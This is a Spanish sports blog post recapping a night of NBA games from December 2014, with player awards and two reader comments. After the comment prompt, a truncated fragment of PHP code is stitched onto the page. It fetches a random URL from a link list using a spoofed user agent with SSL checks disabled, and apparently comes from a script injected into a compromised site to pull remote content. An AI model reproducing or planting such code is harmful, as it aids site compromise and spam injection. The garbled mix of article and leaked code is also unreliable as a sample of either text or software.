La Crónica: All you need is love

09 de December de 2014 por FranGuaita

Bajo la atenta mirada del príncipe Guillermo de Inglaterra y su esposa Kate Middleton, Cleveland asalta Brooklyn con doble doble de Kevin Love. Crónica en rosa al margen, 13 victorias consecutivas de Golden State, que sigue siendo el mejor equipo de la NBA. Triple at the buzzer de Blake Griffin -sí, de Blake Griffin-, para un desenlace brutal del Clippers-Suns. Además, John Wall frenó a los Celtics en Washington recordando a Damiya. Una bonita historia. Baloncesto y vida.

Pasen y lean…

love_royal

NETS 88 – CAVALIERS 110

En pleno tercer cuarto, los flashes comenzaron a dispararse durante una serie de tiros libres a cargo de Kevin Love. Las fotografías, sin embargo, no tenían como protagonista al 4×4 de los Cavaliers. En ese preciso instante, irrumpían en el Barclays Center el príncipe Guillermo de Inglaterra y su esposa, Kate Middleton. La visita real tuvo efectos energizantes para Cleveland. El parcial desde el aterrizaje de sus majestades en los asientos a pie de pista reservados para la ocasión fue de 49-27. Cosa de reyes. LeBron pudo sonreír de nuevo. Siete triunfos sin fallo para la franquicia que aspira a conquistar la tierra de los sueños cuando llegue junio. A nivel numérico, partido discreto de James: 18 puntos, 4 rebotes y 7 asistencias. Kevin Love fue el MVP del partido con un portentoso doble doble (19 puntos y 14 rebotes). Waiters le acompañó generando 26 puntos para brillar en la noche de Brooklyn. En los Nets, Mirza Teletovic nos regaló la jugada de la noche. Canastón a aro pasado -rectificado incluido- ante la defensa de Love. Todo con mucho amor.

PACERS 92 – HAWKS 108

Atlanta ha adquirido velocidad de crucero. Séptima victoria consecutiva para el equipo dirigido por Mike Budenholzer, que ya es segundo en la conferencia Este y amenaza el cetro de los Raptors. El momento de excelente confianza por el que atraviesa cada uno de los jugadores de la franquicia de Georgia quedó patente en el primer cuarto disputado en el Bankers Life Fieldhouse. Lluvia de triples, además, a cargo de tiradores poco fiables como De-Marre Carroll (3/3 desde el perímetro en el primer cuarto) e incluso Al Horford. El dominicano se atrevió con un tiro de tres lateral junto al banquillo de Indiana. Entró limpio. Su mirada hacia Budenholzer con sonrisa cómplice fue el momento de la madrugada. “Nos entra todo, coach”… Para la noche en que los Hawks no vean el aro como una piscina olímpica, siempre les quedará el plan A: Defense. Como ocurre en tantos equipos, esa dulzura delante está directamente relacionada con el nivel defensivo que impuso Atlanta desde el inicio. Millsap y Horford se aplicaron mucho en la defensa del dos por dos, anulando la amenaza de continuación de David West y dinamitando los caminos interiores para dificultar que Hibbert recibiera en posición de anotar con comodidad. Las águilas vuelan alto.

WIZARDS 133 – CELTICS 132 (2OT)

John Wall tardará en olvidar este 8 de diciembre de 2014. Y no será precisamente por anotar los últimos 10 puntos del thriller en el que Washington se impuso a los Celtics horas después de la derrota de los Wizards en el TD Garden. En la mañana del lunes, Wall supo vía sms que Damiya Telemaque-Nelson había fallecido. Damiya era una peque de seis años paciente de cáncer a la que el base nacido en Raleigh había conocido hace unos meses. Inspirado en su memoria, Wall apareció al rescate en la segunda prórroga. Con Washington siete bajo, enchufó diez puntos consecutivos para poner a su equipo arriba (132-130) en el último minuto. Su influencia en el juego no se limitó al apartado de la anotación. Las 17 asistencias que repartió en el Verizon Center suponen la mejor marca de su carrera NBA. Una W para Damiya, a la que recordó entre lágrimas en la entrevista postpartido.

RAPTORS 112 – NUGGETS 107 (OT)

Toronto sigue liderando la conferencia Este. Sufriendo, pero líderes. Recurriendo a tiradores de tres agazapados en su frontcourt, pero defendiendo la primera posición con garras y fauces. Como los dinosaurios de la legendaria peli de Spielberg. Patrick Patterson enchufó un triple en la recta final de la prórroga para mantener a los Raptors con opciones de mantener su racha de triunfos. Antes, Louis Williams llevó el peso de las operaciones con 26 puntos desde el banquillo. Y la sociedad Lowry (13 puntos, 13 asistencias) – Valanciunas (18 puntos, 12 rebotes y 4 tapones) no obtuvo respuesta por parte de Denver. Mucha atención al esfuerzo de los Nuggets. Mantuvieron al Air Canada Centre con la congoja en el cuerpo toda la madrugada pese a las ausencias de Manimal, McGee y Nate Robinson.

TIMBERWOLVES 86 – WARRIORS 102

Otra noche en la oficina para el mejor equipo de la NBA. Sin llegar siquiera a pisar el acelerador, Golden State implementa su registro de la regular season a una tremenda marca de 18-2. Son trece victorias consecutivas, la última en el Target Center tras imponerse con contundencia en cada uno de los tres primeros cuartos. El libreto fue el de casi siempre. 21 puntos de cada uno de los Splash Brothers y dobles figuras para dos referencias de la segunda unidad warrior como Speights y Livingston.

KINGS 101 – JAZZ 92

Ante la ausencia de DeMarcus Cousins por un problema vírico durante una semana más, Rudy Gay ha optado por asumir toda la responsabilidad ofensiva en Sacramento. La fórmula funciona ante franquicias en plena transición como los bisoños Utah Jazz. Gay se marchó hasta los 29 puntos con una serie de 10/19 en tiros de campo y los Kings se mantienen al acecho de Phoenix en la batalla por la última posición de playoff en el salvaje Oeste.

CLIPPERS 121 – SUNS 120 (OT)

Segundos después del estallido de la bocina, Blake Griffin no sabía si saltar, correr, llorar de alegría o sencillamente arrodillarse y dar gracias al cielo por un tiro que recordará durante mucho tiempo. Con los Clippers dos bajo y los artificieros de Clippers bien defendidos por el perímetro de Phoenix, Griffin se atrevió con la winning basket. Un triple bien punteado que se estrelló en la superficie del aro, describió una parábola ascendente mientras el tablero se iluminaba, y acabó entrando. Un guiño del destino. “We win!”, estallaba el electrónico del Staples. Cambio de guardia en Hollywood. Clipperland sonríe.

PREMIOS

MVP: 45 puntos y 8 rebotes con un broche de oro inmejorable. Un partido para la historia de Blake Griffin. No podemos dejar de destacar tampoco el partidazo de John Wall. 26 puntos, 7 rebotes , 17 asistencia y una enorme carga emotiva.

Rookie: El banquillo de los Celtics anotó 82 puntos, algo que el Garden no veía desde hace casi 20 años. Buena parte de culpa la tuvo Marcus Smart que se fue a los 23 puntos que aderezó con 4 rebotes y 5 asistencias. Por su parte, Nik Stauskas jugó su mejor partido como profesional ante los JAzz. 17 puntos y 8 rebotes para el escolta de los Kings.

Sorpresa: Dion Waiters está siendo muy cuestionado en Cleveland pero ayer se reivindicó con 26 puntos. El irregular Kelly Olynyk nos ofreció ayer su mejor versión: anotó 19 puntos, capturó 11 rebotes y robó 4 balones.

Decepción: Rajon Rondo se quedó sin anotar en los 21 minutos que estuvo sobre la cancha. Kyrie Irving sí que lo hizo pero no de manera muy eficiente. Apenas 7 puntos con un 2 de 10 en TC.

Esfuerzo en vano: Seguro que Eric Bledsoe cambiaría su triple doble por la victoria que se les escapó entre los dedos a los Suns. Tremendísimo partidos del base de los Suns que amilanó al Staples durante todo el partido y acabó con 27 puntos, 11 reotes, 16 asistencias, 2 robos y 2 tapones.

Top 10

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. rumbero dice:
    #1

    Pues ayer va Boston y remonta en el último cuarto para quitarse algunos fantasmas…y acaba desaprovechando dos ventajas de +7 en las dos prórrogas. Cierto es que delante tuvieron a Pierce y Wall con muchas ganas de ganar el partido. Pelillos de punta la entrevista portpartido del segundo.

    ¿Y quíen decía que Griffin no sabe tirar de 3? 2/2 con ese buzzerbeater que entra límpisimo, pura estética ¬¬’

      Citar

  2. MagicJohnson32 dice:
    #2

    rumbero:

    ¿Y quíen decía que Griffin no sabe tirar de 3? 2/2 con ese buzzerbeater que entra límpisimo, pura estética ¬¬’

    ¡¡¡Bonilla!!! xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>